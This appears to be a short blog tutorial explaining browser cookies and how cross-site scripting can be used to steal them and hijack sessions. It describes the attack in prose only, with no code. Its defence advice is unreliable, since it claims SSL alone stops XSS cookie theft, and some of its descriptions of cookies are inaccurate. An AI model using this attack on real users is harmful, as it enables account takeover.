Cross-Site Scripting: Cookie Stealing Attack

What is a Cookie ?

A cookie can be interpreted as tiny bits of data. These are the session’s information about you on a particular website. For example, a website used for online shopping saves your added items into the shopping cart. Suppose you are on step 5 or 6 where you add a payment option. How does the website remember what you already have typed in? This gets done through the use of cookies. So, for the first time when you visit a website, it sends you back a cookie. This cookie is a unique identifier to you.

This gives out analytical information about the user. For example, user preferences, most visited pages, time spent on a particular page, etc. When you get a cookie from a website, it saves particular analytical information about you And then sends it back to the server. If you already have visited the website, it helps the server remember you by its unique cookie.

As of now, cookies can also be used to track what you’re up to online. For example, they are used to show relevant ads to a specific user. If the user has searched for a particular item to be purchased online. Then the particular website shows the ads for particular items.

Why do we require Cookies ?

HTTP and HTML are not persistent. When you make an HTTP request to a website, it shows you HTML and maybe Javascript. This is the end of that particular transaction. When you make another request, this becomes a whole new transaction. There is no particular way in that mechanism that results in persistence. When you click on another link or search for something else, it will start a new connection. Or use the existing connection to send off another HTTP request. The cookies create persistence and save analytical information about the user. Which results in creating persistence over a particular website session.

What is Cookie Stealing ?

When an attacker can gain a hold of your cookie for a particular website, he can pretend to be you. This can result in the exploitation of sensitive data or information about a particular user. If the connection is not secure, the attacker can use a cross-site scripting attack to hijack a session. XSS can also be used to steal cookies. The cookies get saved into the web browser of a user. The cookies not only stay between the web site’s server and web browser of the user but can also travel across the internet. It can bounce from server to server before reaching its destination.

If the cookies are not securely encrypted then an attacker can intercept and use them to pretend to be you for specific websites. Another problem arises that cookies also sensitive information about you. For example, bank details, emails, addresses, etc.  

How an attacker steal cookies using Cross-site Scripting attack and Hijack session?

The attacker can perform a code injection attack to steal cookies and sessions of a particular website. If the web application is vulnerable to cross-site scripting attacks, then cookies can be stolen easily by the attacker. Basically, the attacker injects a malicious javascript code into the vulnerable place of a website. The attacker programs this code in a way that it returns and prints the cookie information of a target user.

The attacker can essentially send a link to the victim and steal the cookie. For example, if any user has logged into a website and has cookie persistence. Then the attacker can send a link to that same website and the malicious code gets executed in the background. This code returns the cookies to the attacker, which then can be used to hijack the particular session. After hijacking the session the attacker can further exploit sensitive information by pretending to be you. This includes your bank details, credit card details, addresses, etc.

How to defend against Cookie Stealing ?

Secure your connections by installing SSL certificates. If the cookies get stored in plain texts, the attacker can use them directly. Installing SSL certificates would encrypt all your traffic. So, even if the attacker intercepts your network traffic and steals the cookie, they won’t be able to hijack the session because of encryption.

Leave a Comment

Your email address will not be published. Required fields are marked *